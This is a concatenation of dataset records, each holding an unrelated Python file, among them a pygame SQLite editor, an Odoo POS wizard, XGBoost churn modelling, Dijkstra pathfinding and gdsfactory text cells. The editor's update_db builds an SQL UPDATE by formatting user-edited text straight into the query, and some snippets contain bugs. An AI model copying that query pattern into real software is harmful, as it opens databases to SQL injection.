video_input['label']\n index = selected_labels.index(label)\n video_input['label_index'] = index\n with open(target_file, 'w') as video_output_file:\n json.dump(video_input, video_output_file, indent=3)\n\n\n # copyfile(source_file, target_file)\n\n\n\ndef process_count_labels(arg):\n part = ['train', 'val']\n for p in part:\n label_path = '{}/kinetics_{}_label.json'.format(arg.data_path, p)\n find_and_count_labels(label_path, p, arg.labels)\n\n\ndef process_slice_labels(arg):\n part = ['train', 'val']\n for p in part:\n source_label_path = '{}/kinetics_{}_label.json'.format(arg.data_path, p)\n source_data_path = '{}/kinetics_{}'.format(arg.data_path, p)\n target_label_path = '{}/kinetics_{}_label.json'.format(arg.output_path, p)\n target_data_path = '{}/kinetics_{}'.format(arg.output_path, p)\n find_and_slice_labels(source_data_path, source_label_path, target_data_path, target_label_path, p, arg.labels)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Skeleton data processing utility', epilog='Hope I`ve been helpfull! 
See`ya')\n parser.add_argument('operation', choices=['count_labels', 'slice_labels'])\n parser.add_argument('--data_path', nargs=1, help='Path to data to be processed', default='data/raw/kinetics-skeleton')\n parser.add_argument('--output_path', help='Path to write data after processing', default='data/raw/kinetics-skeleton/slice/temp')\n parser.add_argument('--labels', nargs='*', help='Labels to be processed', default='')\n args = parser.parse_args()\n if args.operation == 'count_labels':\n process_count_labels(args)\n elif args.operation == 'slice_labels':\n process_slice_labels(args)\n else:\n print('Im nothing')","sub_path":"processing/kinetics_data.py","file_name":"kinetics_data.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406850947","text":"import pygame, time, sys\nimport sqlite3\nfrom textbox import *\n\nclass Editor(object):\n def __init__(self):\n global field_name\n pygame.init()\n pygame.font.init()\n self.font = pygame.font.Font('data/GameFont.ttf', 16)\n\n pygame.display.set_caption(\"SQL Editor\")\n self.screen = pygame.display.set_mode((1024, 700), pygame.RESIZABLE)\n self.clock = pygame.time.Clock()\n\n self.conn = sqlite3.connect('data/saves/data.db')\n self.c = self.conn.cursor()\n\n self.array = []\n self.default_text = \"None\"\n self.current_row = \"None1\"\n\n self.field_name = []\n for name in self.c.execute(\"PRAGMA table_info(csv);\"):\n self.field_name.append(name)\n\n self.running = True\n self.draw_db()\n while self.running:\n event = pygame.event.wait ()\n if event.type == pygame.QUIT:\n self.running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.running = False\n elif pygame.mouse.get_pressed()[0] == 1:\n self.default_text, self.mouse_handler(pygame.mouse.get_pos())\n self.input_box = self.edit_popup(self.default_text)\n self.c.close()\n\n def update_db(self, id, data, current_row, 
default_text):\n conn = sqlite3.connect('data/saves/data.db')\n c = conn.cursor()\n field_name = []\n for name in c.execute(\"PRAGMA table_info(csv);\"):\n field_name.append(name)\n\n for col_name in field_name:\n for row_index, row in enumerate(c.execute('SELECT * FROM csv'.format(col_name[1]))):\n if row == current_row:\n for item_index, item in enumerate(row):\n if default_text in item:\n c.execute(\"UPDATE csv SET {0}='{1}' WHERE {0}='{3}' AND {4}='{5}'\"\n .format(col_name[1], data, col_name[1], default_text,\n field_name[1][1], current_row[1]))\n conn.commit()\n \n def draw_db(self):\n for col_name in self.c.execute(\"PRAGMA table_info(csv);\"):\n for name_index, name in enumerate(self.field_name):\n text = self.font.render(name[1], True, pygame.Color('White')) \n self.screen.blit(text, (30+name_index*120, 30+0*20))\n pass\n for row_index, row in enumerate(self.c.execute('SELECT * FROM csv'.format(col_name[1]))):\n self.array.append(row)\n for item_index, item in enumerate(row):\n text = self.font.render(item, True, pygame.Color('White')) \n self.screen.blit(text, (30+item_index*120, 30+(row_index+1)*20))\n pass\n pygame.display.update()\n\n def edit_popup(self, default_text):\n x = (pygame.display.get_surface().get_size()[0]-200)/2\n y = (pygame.display.get_surface().get_size()[1]-40)/2\n \n self.app = Control(self.screen, (x, y, 200, 40), self.__class__, self.current_row, self.default_text)\n self.app.main_loop()\n self.screen.fill(pygame.Color('Black'))\n self.conn.commit()\n self.draw_db()\n\n def mouse_handler(self, mouse_pos):\n mouse_x, mouse_y = mouse_pos[0], mouse_pos[1]\n for y, row in enumerate(self.array):\n for x, item in enumerate(self.array[y]):\n if mouse_x > 30+(x*150) and mouse_x < 30+(x*150)+150:\n if mouse_y > 30+((y+1)*23) and mouse_y < 30+((y+1)*23)+23:\n self.default_text = self.array[y][x]\n self.current_row = self.array[y]\n \n\nclass Control(object):\n def __init__(self, screen, dimensions, parent, current_row, default_text):\n 
KEY_REPEAT_SETTING = (150,50)\n pygame.init()\n pygame.display.set_caption(\"Input Box\")\n self.screen = screen\n self.clock = pygame.time.Clock()\n self.fps = 60.0\n self.done = False\n self.dimensions = dimensions\n self.input = TextBox(dimensions,parent=parent,current_row=current_row,command=Editor.update_db,\n clear_on_enter=True,inactive_on_enter=False,\n buffer=list(default_text), default_text=default_text)\n self.color = (100,100,100)\n self.prompt = self.make_prompt()\n pygame.key.set_repeat(*KEY_REPEAT_SETTING)\n\n def make_prompt(self):\n font = pygame.font.SysFont(\"arial\", 20)\n rend = font.render(\"\", True, pygame.Color(\"white\")) \n return (rend, rend.get_rect(topleft=(0, 0)))\n\n def event_loop(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.done = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.done = True\n self.input.get_event(event)\n\n def main_loop(self):\n while not self.done:\n self.event_loop()\n self.input.update()\n self.input.draw(self.screen)\n self.screen.blit(*self.prompt)\n pygame.display.update()\n self.clock.tick(self.fps)\n","sub_path":"lib/db_interface.py","file_name":"db_interface.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"371400467","text":"import chaospy as cp\nimport numpy as np\n\n# modele : u represente l'ecart de temperature T-Ti\ndef u(t, a, I) :\n\treturn I*np. 
exp(-a*t)\n\n# Definition des distributions statistiques\ndist_a = cp.Uniform(0., 0.001)\ndist_I = cp.Uniform(10, 16)\ndist = cp.J(dist_a, dist_I)\n\n#integration Monte Carlo avec plan de tirages Latin Hypercube \nsamples = dist.sample(1000, rule=\"L\")\nt = np.linspace(0, 1200, 10)\nsample_u = [u(t, *s) for s in samples.T]\n\nE = np.mean(sample_u,0)\nVar = np.var(sample_u,0)\nprint('MC avec plan de tirages Latin Hypercube :')\nprint('E : ',E)\nprint('Var : ',Var)\n","sub_path":"scripts/Application16_EquaDif_chaospy2.py","file_name":"Application16_EquaDif_chaospy2.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"402572939","text":"# -*- coding: utf-8 -*-\n# Created by Hoanglv on 9/5/2019\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import except_orm\n\nfrom addons_custom.izi_message_dialog.message_dialog_config import MessageDialogConfig\n\n\nclass SaleOrderMakePosOrder(models.TransientModel):\n _name = 'sale.order.make.pos.order'\n _inherit = ['message.dialog']\n\n pos_config_id = fields.Many2one('pos.config', string='Pos config')\n pos_session_id = fields.Many2one('pos.session', string='Pos session')\n\n @api.onchange('pos_config_id')\n def _onchange_pos_config_id(self):\n if self.pos_config_id:\n session = self.env['pos.session'].search([('config_id', '=', self.pos_config_id.id),\n ('state', '=', 'opened')], limit=1)\n self.pos_session_id = session.id if session else False\n\n @api.multi\n def create_pos_order(self):\n if not self.pos_session_id:\n raise except_orm(_('Warning'), _('Request to create a session before create pos order.'))\n pos = self.move_to_pos()\n return self.__get_pos_view(pos)\n\n def __get_pos_view(self, pos):\n view_id = self.env.ref('point_of_sale.view_pos_pos_form').id\n return {\n 'name': pos.name,\n 'type': 'ir.actions.act_window',\n 'res_model': 'pos.order',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'views': 
[(view_id, 'form')],\n 'target': 'current',\n 'res_id': pos.id,\n 'context': dict(self._context),\n }\n\n def move_to_pos(self):\n sale_order = self.env['sale.order'].browse(self._context.get('sale_order_id'))\n if not sale_order:\n raise except_orm(_('Error'), _('Sale order not exists'))\n\n pos = self.__create_pos_order(sale_order)\n sale_order.state = 'moved_to_pos'\n return pos\n\n def __create_pos_order(self, sale_order):\n pos_session = self.env['pos.session'].browse(self.pos_session_id.id)\n\n lines = []\n for line in sale_order.order_line:\n lines.append((0, 0, {\n 'company_id': line.company_id.id,\n 'name': line.name,\n 'product_id': line.product_id.id,\n 'qty': line.product_uom_qty,\n 'discount': line.discount,\n 'price': line.price_unit,\n 'price_unit': line.price_unit,\n 'price_subtotal': line.price_subtotal,\n 'price_subtotal_incl': line.price_total\n }))\n\n if len(lines) < 1:\n raise except_orm('Cảnh báo', 'Đơn hàng chưa có sản phẩm,\\n'\n 'vui lòng cập nhật lại để có thể thực hiện tác vụ này.')\n\n pos_order_vals = {\n 'amount_tax': sale_order.amount_tax,\n 'amount_total': sale_order.amount_total,\n 'partner_id': sale_order.partner_id.id,\n 'date_order': sale_order.date_order,\n 'x_rank_id': sale_order.partner_id.x_rank_id.id,\n 'pricelist_id': sale_order.pricelist_id.id,\n 'user_id': pos_session.user_id.id,\n 'x_team_id': pos_session.user_id.sale_team_id.id,\n 'company_id': sale_order.company_id.id,\n 'session_id': pos_session.id,\n 'branch_id': sale_order.branch_id.id,\n 'pos_reference': sale_order.name,\n 'note': sale_order.note,\n 'sale_order_id': sale_order.id,\n 'lines': lines\n }\n\n pos = self.env['pos.order'].create(pos_order_vals)\n return pos\n\n def get_dialog(self):\n view_id = self.env.ref('izi_sale_order.sale_order_make_pos_order').id\n ctx = self._context.copy()\n ctx.update({\n 'izi_type': MessageDialogConfig.MessageDialogType.INFO,\n 'dialog_size': MessageDialogConfig.MessageDialogSize.MEDIUM\n })\n return {\n 'name': 'Choose 
session to create pos order',\n 'type': 'ir.actions.act_window',\n 'res_model': 'sale.order.make.pos.order',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'views': [(view_id, 'form')],\n 'target': 'new',\n 'context': ctx,\n }\n","sub_path":"izi_sale_order/wizards/sale_order_make_pos_order.py","file_name":"sale_order_make_pos_order.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281274348","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 18 20:33:13 2020\n\n@author: ramonpuga\n\"\"\"\n\n# XGBoost\n# Es muy potente para grandes conjuntos de datos (bigdata)\n\n# Las instrucciones de instalación se pueden consultar en http://xgboost.readthedocs.io/en/latest/build.html\n# Instalar en macOS Homebrew\n\n# Cómo importar las librerías\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importar el data set\ndataset = pd.read_csv('Churn_Modelling.csv')\n\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n\n# Codificar datos categóricos\nfrom sklearn.preprocessing import LabelEncoder\nlabelencoder_X_1 = LabelEncoder()\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\nlabelencoder_X_2 = LabelEncoder()\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\n\n#El OneHotEncoder en las nuevas versiones está OBSOLETO\n#onehotencoder = OneHotEncoder(categorical_features=[1])\n#X = onehotencoder.fit_transform(X).toarray()\n\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\ntransformer = ColumnTransformer(\n transformers=[\n (\"Churn_Modelling\", # Un nombre de la transformación\n OneHotEncoder(categories='auto'), # La clase a la que transformar\n [1] # Las columnas a transformar.\n )\n ], remainder='passthrough'\n)\n\nX = transformer.fit_transform(X)\n# Eliminar columna 0 para evitar la multicolinealidad\nX = X[:, 1:]\n\n# Dividir el data set en conjunto de 
entrenamiento y conjunto de testing\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n# Ajustar el modelo XGBoost al Conjunto de Entrenamiento\nfrom xgboost import XGBClassifier\nclassifier = XGBClassifier()\nclassifier.fit(X_train, y_train)\n\n# Predicción de los resultados con el Conjunto de Testing\ny_pred = classifier.predict(X_test)\n#y_pred = (y_pred > 0.5)\n\n# Elaborar una matriz de confusión\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\n# Aplicar k-fold cross validation\nfrom sklearn.model_selection import cross_val_score\naccuracies = cross_val_score(estimator = classifier, X = X_train, y = y_train, cv = 10)\naccuracies.mean()\naccuracies.std()\n# Sale una media del 86% de precisión y la desviación estandar en torno al 1%\n# Precisión bastante elevada y con poca varianza \n\n\n","sub_path":"datasets/Part 10 - Model Selection & Boosting/Section 49 - XGBoost/my_xgboost.py","file_name":"my_xgboost.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"630742188","text":"\"\"\"\r\nMatthew Sabo\r\nDijkstra\r\nCopywrite 2018\r\n\"\"\"\r\n\r\nfrom bfs import SquareGrid\r\nfrom Queue import PriorityQueue\r\nimport time\r\n\r\nclass WeightedGrid(SquareGrid):\r\n def __init__(self, width, height):\r\n super().__init__(width, height)\r\n self.weights = {}\r\n\r\n def cost(self, from_node, to_node):\r\n return self.weights.get(to_node, 1)\r\n\r\n def print(self):\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n if ((x, y) in self.path): print(\"* \", end='')\r\n elif ((x, y) in self.walls): print(\"X \", end ='')\r\n else: print(\"%d \" % self.weights[(x, y)], end='')\r\n print(\"\\n\")\r\n\r\ndef dijkstra(grid, start, goal):\r\n frontier = PriorityQueue()\r\n frontier.put(start, 0)\r\n visited = {}\r\n 
cost_so_far = {}\r\n visited[start] = None\r\n cost_so_far[start] = 0\r\n\r\n while not frontier.empty():\r\n current = frontier.get()\r\n if current == goal: break\r\n for next in grid.neighbors(current):\r\n new_cost = cost_so_far[current] + grid.cost(current, next)\r\n if next not in cost_so_far or new_cost < cost_so_far[next]:\r\n cost_so_far[next] = new_cost\r\n priority = new_cost\r\n frontier.put(next, priority)\r\n visited[next] = current\r\n\r\n return visited, cost_so_far\r\n\r\ndef build_path(visited, start, goal):\r\n current = goal\r\n path = []\r\n while current != start:\r\n path.append(current)\r\n current = visited[current]\r\n path.append(start)\r\n path.reverse()\r\n return path\r\n\r\ngrid = WeightedGrid(15, 15)\r\ngrid.walls = [(7, 2), (7, 3), (7, 4), (7, 5), (7, 6), (7, 7), (7, 8), (7, 9)]\r\nfor x in range(15):\r\n for y in range(15):\r\n grid.weights[(x, y)] = 1\r\n\r\nfor x in range(6):\r\n for y in range(4):\r\n grid.weights[(x+1, y+10)] = 9\r\n\r\ngrid.print()\r\nprint(\"\\n\\n\")\r\n\r\nstart = time.time()\r\n(visited, costs) = dijkstra(grid, (1, 4), (14, 11))\r\nend = time.time()\r\nprint(\"Dijkstra time: %f\" %(end-start))\r\npath = build_path(visited, (1, 4), (14, 11))\r\ngrid.path = path\r\ngrid.print()","sub_path":"AILib/AILib/Pathfinding/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"158018528","text":"from math import sqrt\nfrom java.util import BitSet\nfrom java.util.stream import Collectors\n\n\ndef sieve(limit=100):\n primes = BitSet(limit + 1)\n primes.set(2, limit + 1)\n prime = 2\n while prime <= int(sqrt(limit)) + 1:\n for multiple in range(prime * prime, limit + 1, prime):\n primes.clear(multiple)\n prime = primes.nextSetBit(prime + 1)\n return primes.stream().boxed().collect(Collectors.toList())\n\n\nif __name__ == '__main__':\n 
print(sieve(10000000))\n","sub_path":"jython/src/sieve-bitset.py","file_name":"sieve-bitset.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"203306921","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom pymongo import MongoClient\n\nclass CircPipeline(object):\n def process_item(self, item, spider):\n client = MongoClient()\n collection = client[\"test\"][\"chufa\"]\n time = item[\"time\"]\n title = item[\"title\"]\n print(\"时间:{} 标题:{}\".format(time, title))\n collection.insert(dict(item))\n return item\n","sub_path":"circ/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610336980","text":"import numpy as np\r\nimport pandas as pd\r\n# df is your DataFrame\r\n\r\ndef get_PN(iid): # S_p와 S_n 구함\r\n x = df[df['iid']==str(iid)]\r\n #print(x.shape)\r\n if not x.shape[0]: #일치하는 iid가 없을 경우 0 return\r\n return 0\r\n P = []\r\n N = []\r\n U=25 # 총 유저수\r\n for i in range(0, x.shape[0]):\r\n tmp = x[i:i+1]\r\n if tmp['rating'].iloc[0] > 0.5 :\r\n P.append(tmp['uid'].iloc[0]) # P에 해당하는 인원 P에 추가\r\n else:\r\n N.append(tmp['uid'].iloc[0]) # N에 해당하는 인원 N에 추가\r\n S_p = 1-(len(P)/U) # P의 길이 = P 유저 수 \r\n S_n = 1-(len(N)/U) # N의 길이 = N 유저 수\r\n tmp = [[iid, S_p, S_n]]\r\n return tmp # iid와 iid의 S_p, S_n값을 담은 리스트 리턴\r\n\r\nS = pd.DataFrame(columns=[\"iid\", \"S_p\", \"S_n\"]) # get_PN 이용, iid별 S_p와 S_n를 구한다.\r\nfor i in range(0,150):\r\n result = get_PN(i)\r\n if result == 0: #반환값이 0 이면 데이터 프레임에 담지 않음\r\n continue\r\n tmp = pd.DataFrame(data=result, columns = [\"iid\", \"S_p\", \"S_n\"])\r\n S = S.append(tmp)\r\n \r\ndef Singularity(df):\r\n NumUsers = 25 #총 유저수\r\n sim = 
np.full((NumUsers,NumUsers), 0.0)\r\n for u in range(0,NumUsers):\r\n for v in range(u+1, NumUsers):\r\n u1 = df[df['uid']==str(u+1)] # uid가 일치하는 행들을 추출\r\n u2 = df[df['uid']==str(v+1)]\r\n\r\n inter = pd.merge(u1['iid'], u2['iid'], on='iid') # u1과 u2가 일치하는 iid를 추출(교집합)\r\n A=0\r\n B=0\r\n C=0\r\n A_val=0\r\n B_val=0\r\n C_val=0\r\n for i in range(len(inter)):\r\n iid = inter[i:i+1] #iid 교집합중 하나씩 추출\r\n iid = pd.to_numeric(iid.iid)\r\n iid = iid[i] #index로 먹기때문에 인덱스를 i로 맞춰주면댐\r\n S_p = S[S['iid']==iid]['S_p'].iloc[0]\r\n S_n = S[S['iid']==iid]['S_n'].iloc[0]\r\n #print(\"u= \",u,\"v= \",v,\"i= \",i)\r\n u1_rating = float(u1[u1['iid']==str(iid)]['rating'].iloc[0]) #각 레이팅 추출\r\n u2_rating = float(u2[u2['iid']==str(iid)]['rating'].iloc[0])\r\n tmp = u1_rating - u2_rating\r\n if u1_rating > 0 and u2_rating > 0:#공식에 맞게 설정\r\n A += 1\r\n A_val += (1-tmp*tmp)*S_p*S_p\r\n elif u1_rating <=0 and u2_rating <= 0:\r\n B += 1\r\n B_val += (1-tmp*tmp)*S_n*S_n\r\n elif (u1_rating > 0 and u2_rating <=0) or (u1_rating <= 0 and u2_rating >0):\r\n C +=1\r\n C_val += (1-tmp*tmp)*S_p*S_n\r\n\r\n if A==0 and B==0 and C==0: #각 A,B,C의 경우들 나열해 결과값 조정\r\n result = '0'\r\n elif A==0 and B==0:\r\n result = C_val/C\r\n elif B==0 and C==0:\r\n result = A_val/A\r\n elif A==0 and C==0:\r\n result = B_val/B\r\n elif A==0:\r\n result = (B_val/B + C_val/C)/2\r\n elif B==0:\r\n result = (A_val/A + C_val/C)/2\r\n elif C==0:\r\n result = (A_val/A + B_val/B)/2\r\n else:\r\n result = (A_val/A + B_val/B + C_val/C)/3\r\n sim[u,v] = result\r\n sim[v,u] = sim[u,v]\r\n return sim","sub_path":"singularity.py","file_name":"singularity.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"590812623","text":"from django.shortcuts import render\nfrom . import forms\nfrom django.core.files.storage import FileSystemStorage\nfrom . 
import ocr_optifine\nfrom django.http import HttpResponse\nimport glob\nimport os\nfrom PIL import Image\nimport pytesseract\nimport argparse\nimport cv2\n\n# Create your views here.\ndef index(request):\n emptyMedia()\n return render(request,'firstapp/formpage.html')\n\ndef form_name_view(request):\n form =forms.FormName()\n emptyMedia()\n if(request.method=='POST'):\n form=forms.FormName(request.POST)\n uploaded_file=request.FILES['document']\n\n emptyMedia() #delete previous images\n fs = FileSystemStorage()\n fs.save(uploaded_file.name,uploaded_file)\n \n \n \n print(\"Image saved\")\n text=ocr_optifine.main()\n \n renameImage();\n \n if(text!='/0'):\n my_dict ={'text':text}\n return render(request,'firstapp/formpage.html',context=my_dict)\n\n\n return render(request, 'firstapp/formpage.html', {'form':form})\n\n\ndef emptyMedia():\n files = glob.glob('media/*')\n for f in files:\n os.remove(f)\n\ndef getImagePath():\n IMAGES_DIR=\".\\media\"\n # print(IMAGES_DIR)\n for fileName in os.listdir(IMAGES_DIR):\n print(\" \")\n im_dir=os.path.join(IMAGES_DIR, fileName)\n print(im_dir)\n return im_dir\n\ndef renameImage():\n os.rename(getImagePath(),\"media/img.png\")","sub_path":"formproject/firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"110733824","text":"from imutils import contours\nfrom skimage import measure\nimport numpy as np\nimport imutils\nimport cv2\n\n\nclass VisionManager():\n def __init__(self, path: str):\n self.image = cv2.imread(path)\n self.mask = None\n self.threshold = None\n self.gaussian = None\n self.gray = None\n self.gauss_x = 11\n self.gauss_y = 11\n self.thresh_x = 52\n self.thresh_y = 200\n\n def execute_detect(self):\n self.gray_filter()\n self.gaussian_filter(self.gauss_x, self.gauss_y)\n self.threshold_op(self.thresh_x, self.thresh_y)\n self.create_labels()\n self.get_circles_world()\n\n def 
save_image(self, output_path):\n cv2.imwrite(output_path, self.image)\n\n def create_labels(self):\n labels = measure.label(self.threshold,\n connectivity=1)\n self.mask = np.zeros(self.threshold.shape,\n dtype=\"uint8\")\n for label in np.unique(labels):\n if label == 0:\n continue\n\n label_mask = np.zeros(self.threshold.shape, dtype=\"uint8\")\n label_mask[labels == label] = 255\n num_pixels = cv2.countNonZero(label_mask)\n if num_pixels > 300:\n self.mask = cv2.add(self.mask, label_mask)\n\n def gray_filter(self):\n self.gray = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n\n def gaussian_filter(self, x, y):\n self.gaussian = cv2.GaussianBlur(self.gray, (x, y), 0)\n\n def threshold_op(self, x, y):\n image_1 = cv2.threshold(self.gaussian, x, y, cv2.THRESH_BINARY)[1]\n self.threshold = cv2.dilate(cv2.erode(image_1, None, iterations=1),\n None, iterations=8)\n\n def find_lights_world(self):\n return contours.sort_contours(imutils.grab_contours(\n cv2.findContours(self.mask.copy(),\n cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)))[0]\n\n def get_circles_world(self):\n color = (255, 230, 0)\n for k in self.find_lights_world():\n (ki, li), radius = cv2.minEnclosingCircle(k)\n cv2.circle(self.image, (int(ki), int(li)),\n int(radius), color, 1)\n\n\nif __name__ == \"__main__\":\n image_list = [\"data/region1.png\",\n \"data/region2.png\",\n \"data/region3.png\",\n \"data/region4.png\",\n \"data/region5.png\",\n \"data/region6.png\"]\n for index, image in enumerate(image_list):\n\n analytics = VisionManager(image)\n analytics.execute_detect()\n analytics.save_image(f\"data/output_{index}.jpg\")","sub_path":"nasa_proj2/visual_computing_map/population_industry_detect/dlights.py","file_name":"dlights.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"636545379","text":"from typing import Tuple\n\nimport numpy as np\nfrom phidl.geometry import _glyph, _indent, _width\n\nimport 
gdsfactory as gf\nfrom gdsfactory.component import Component\nfrom gdsfactory.components.text_rectangular import text_rectangular\nfrom gdsfactory.name import clean_name\nfrom gdsfactory.tech import LAYER\nfrom gdsfactory.types import Coordinate, Layer\n\n\n@gf.cell\ndef text(\n text: str = \"abcd\",\n size: float = 10.0,\n position: Coordinate = (0, 0),\n justify: str = \"left\",\n layer: Tuple[int, int] = LAYER.TEXT,\n) -> Component:\n \"\"\"Text shapes.\n\n Args:\n text:\n size:\n position:\n justify: left, right, center\n layer:\n\n \"\"\"\n scaling = size / 1000\n xoffset = position[0]\n yoffset = position[1]\n t = gf.Component(f\"{clean_name(text)}_{int(position[0])}_{int(position[1])}\")\n\n for i, line in enumerate(text.split(\"\\n\")):\n label = gf.Component(f\"{t.name}_{i}\")\n for c in line:\n ascii_val = ord(c)\n if c == \" \":\n xoffset += 500 * scaling\n elif 33 <= ascii_val <= 126:\n for poly in _glyph[ascii_val]:\n xpts = np.array(poly)[:, 0] * scaling\n ypts = np.array(poly)[:, 1] * scaling\n label.add_polygon([xpts + xoffset, ypts + yoffset], layer=layer)\n xoffset += (_width[ascii_val] + _indent[ascii_val]) * scaling\n else:\n ValueError(f\"[PHIDL] text(): No character with ascii value {ascii_val}\")\n ref = t.add_ref(label)\n t.absorb(ref)\n yoffset -= 1500 * scaling\n xoffset = position[0]\n justify = justify.lower()\n for label in t.references:\n if justify == \"left\":\n pass\n elif justify == \"right\":\n label.xmax = position[0]\n elif justify == \"center\":\n label.move(origin=label.center, destination=position, axis=\"x\")\n else:\n raise ValueError(f\"justify = {justify} not in ('center', 'right', 'left')\")\n return t\n\n\n@gf.cell\ndef githash(\n text: Tuple[str, ...] 
= (\"\",),\n size: float = 0.4,\n hash_length: int = 6,\n layer: Layer = LAYER.WG,\n) -> Component:\n \"\"\"Returns the repo git hash\n allows a list of text, that will print on separate lines\n\n Args:\n text:\n size:\n hash_length:\n layer:\n\n \"\"\"\n try:\n\n git_hash = gf.CONFIG[\"repo\"][:hash_length]\n git_hash = f\"gf_{git_hash}\"\n except Exception:\n git_hash = f\"gf_{gf.__version__}\"\n\n c = gf.Component()\n t = text_rectangular(text=git_hash, size=size, layer=layer)\n tref = c.add_ref(t)\n c.absorb(tref)\n\n for i, texti in enumerate(text):\n t = text_rectangular(text=texti, size=size, layer=layer)\n tref = c.add_ref(t)\n tref.movey(-6 * size * (i + 1))\n c.absorb(tref)\n return c\n\n\nif __name__ == \"__main__\":\n c = text(\n text=\".[,ABCDEFGHIKKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789:/\",\n size=4.0,\n justify=\"right\",\n position=(120.5, 3),\n )\n # c = githash(text=[\"a\", \"b\"], size=10)\n c.show()\n","sub_path":"gdsfactory/components/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"392612324","text":"from menu import menu\nfrom escrita import escrita\nfrom leitura import leitura\nimport cores\nfrom leitura import extremos\nfrom escrita import apagar_arquivo\nfrom menu import leia_int\nfrom pesquisa import pesquisa\n\n\ndef exibição():\n corL=cores.cores_letra('azul')\n introdução=(f'---------PESSOAS CADASTRADAS--------\\nNOME{\"IDADE\":>32}')\n introdução=cores.pintura(C_L=corL, msg=introdução)\n print(introdução)\n leitura()\n print(cores.pintura(C_L=corL, msg='------FIM DA LEITURA DO ARQUIVO-----'))\n\n\n\nwhile True:\n menu()\n escolha=leia_int('ESCOLHA: ')\n if escolha == 1:\n escrita()\n elif escolha == 2:\n exibição()\n elif escolha == 4:\n extremos('maior')\n elif escolha == 6:\n apagar_arquivo()\n elif escolha == 5:\n extremos('menor')\n elif escolha == 7:\n resposta = pesquisa(str(input('Nome 
desejado: ')).lower().capitalize())\n print(resposta)\n else:\n corL=cores.cores_letra('vermelho')\n fim=(f'{\" \"*10}FIM DO PROGRAMA')\n fim= cores.pintura(C_L=corL, msg=fim)\n print(fim)\n break","sub_path":"Modulação Exercicio/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"379171700","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: nermin.bibic\n\"\"\"\n\nimport json\n\ndef extract_jsons(string, load=True):\n \"\"\"Extracts all valid JSON objects from within the given string.\"\"\"\n string = string.strip()\n li = []\n s = ''\n i = 0\n j = 0\n for c in string:\n if c == '{':\n i += 1\n s += c\n elif c == '}':\n j += 1\n s += c\n else:\n if i > 0:\n s += c\n if i > 0 and i == j:\n o = json.loads(s)\n if load:\n li.append(o)\n else:\n li.append(s)\n s = ''\n i = 0\n j = 0\n return li\n\ndef del_none(d):\n \"\"\"Deletes all the key-value pairs from the dictionary where the value is\n None, recursively and in-place.\"\"\"\n for key, value in list(d.items()):\n if value is None:\n del d[key]\n elif isinstance(value, dict):\n del_none(value)\n return d\n\ndef del_empty_dicts(d):\n \"\"\"Deletes all the key-value pairs from the dictionary where the value is\n an empty dictionary, recursively and in-place.\"\"\"\n for key, value in list(d.items()):\n if value == {}:\n del d[key]\n elif isinstance(value, dict):\n del_empty_dicts(value)\n return 